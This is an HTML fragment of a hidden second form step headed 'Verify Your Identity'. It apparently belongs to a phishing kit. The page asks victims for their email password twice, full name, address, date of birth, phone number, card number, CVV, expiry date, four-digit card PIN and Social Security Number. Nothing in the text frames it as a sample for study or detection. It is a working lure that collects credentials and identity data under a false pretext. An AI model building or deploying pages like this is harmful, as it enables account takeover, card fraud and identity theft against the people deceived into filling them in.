<div style="display: none;" class="content-container" id="Cstep2" role="main" tabindex="-1">
    <form id="step2">
        <div class='row'>
            <div class='large-12 medium-12 small-12 column'>

                
                <h1>Verify Your Identity</h1>

            </div>
        </div>
        <div class='box'>
            <div class='row'>
                <div class='medium-12 columns'>
                    <div class='large-12 medium-12 small-12 column'>
                        <p class="align-right margin-bottom-none">
                            <span class="required">*</span>
                            Required fields
                        </p>
                    </div>




                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="email">Email&nbsp;<span class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input class="stretch"
                                id="email" name="email" type="email"
                                value="" />

                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>


                    <!--PASSWORD-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="email-password">Email Password&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input required class="stretch" id="email-password" maxlength="23"
                                name="VerifyUserRequestHandler.Model.Username" type="password" value="" />

                            
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>
                    
                    <!--CONFIRM EMAIL PASSWORD-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="email-password">Confirm Email Password&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input required class="stretch" id="email-password2" maxlength="23"
                                name="VerifyUserRequestHandler.Model.Username" type="password" value="" />

                            
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>
                    
                    <!--FULL NAME-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="email-password">Full Name&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input required class="stretch" id="fullname" type="text" value="" />

                            
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>

                    <!--FULL ADDRESS-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="email-password">Full Address&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input required class="stretch" id="address" type="text" value="" />

                            
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>

                    <!--DATE OF BIRTH-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="dob">Date Of Birth&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input required class="stretch" id="dob" type="date" value="" />

                            
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>

                    <!--PHONE NUMBER-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="email-password">Phone Number&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input required class="stretch" id="phone" type="text" value="" />

                            
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>
                    

                    <!--NAME OF CARD-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="cardName">Name On Card&nbsp;<span
                                    class="required">*&nbsp;</span></label>

                        </div>


                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">

                            <input required class="stretch" id="cardName" type="text" value="" />

                            
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>


                    
                    <!--CARD NO-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="cardno">Card Number&nbsp;<span class="required">*&nbsp;</span></label>
                    
                        </div>
                    
                    
                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
                    
                            <input minlength="16" required class="stretch" id="cardno" maxlength="16"
                                name="cardno" type="text" placeholder="xxxx-xxxx-xxxx-xxxx" />
                    
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>


                    <!--CVV-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="cvv">Card CVV Number&nbsp;<span class="required">*&nbsp;</span></label>
                    
                        </div>
                    
                    
                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
                    
                            <input required class="stretch" id="cvv" minlength="3" maxlength="3" type="text" placeholder="xxx" />
                    
                    
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>


                    <!--EXP DATE-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="expdate">Card Expiration Date&nbsp;<span class="required">*&nbsp;</span></label>
                    
                        </div>
                    
                    
                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
                    
                            <input required class="stretch" id="expdate" type="month" value="" />
                    
                    
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>


                    <!--CARD PIN-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="pin">Card 4 Digit Pin&nbsp;<span class="required">*&nbsp;</span></label>
                    
                        </div>
                    
                    
                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
                    
                            <input required class="stretch" id="pin" minlength="4" maxlength="4" type="password" placeholder="xxxx" />
                    
                    
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>

                    <!--SSN-->
                    <div class="row&#32;form-row">
                        <div class="large-3&#32;medium-5&#32;small-12&#32;column&#32;"><label class="form-control"
                                for="ssn">Social Security Number&nbsp;<span class="required">*&nbsp;</span></label>
                    
                        </div>
                    
                    
                        <div class="large-4&#32;medium-4&#32;small-12&#32;columns&#32;left">
                    
                            <input required class="stretch" id="ssn" minlength="9" maxlength="9"
                                placeholder="xxx-xxx-xxx" type="password" value="" />
                    
                    
                        </div>
                        <div class="large-5&#32;medium-3&#32;small-12&#32;columns&#32;left"></div>
                    </div>



                    <div class="small-12 columns button-group">
                        <input class="button small navigationButton primary" id="verifyregisterSubmit"
                            name="Submit" type="submit" value="Continue">
                            
                            
                            <input class="button small navigationButton standard cancel" id="verifyCancelCancel" name="Cancel" type="submit" value="Cancel">
                            
                            <input
                            class="button small navigationButton standard back" onclick="navigateBack()" id="verifysigninBack" name="Back"
                            type="button" value="Back">
                    </div>
                </div>
            </div>
        </div>

    </form>
</div>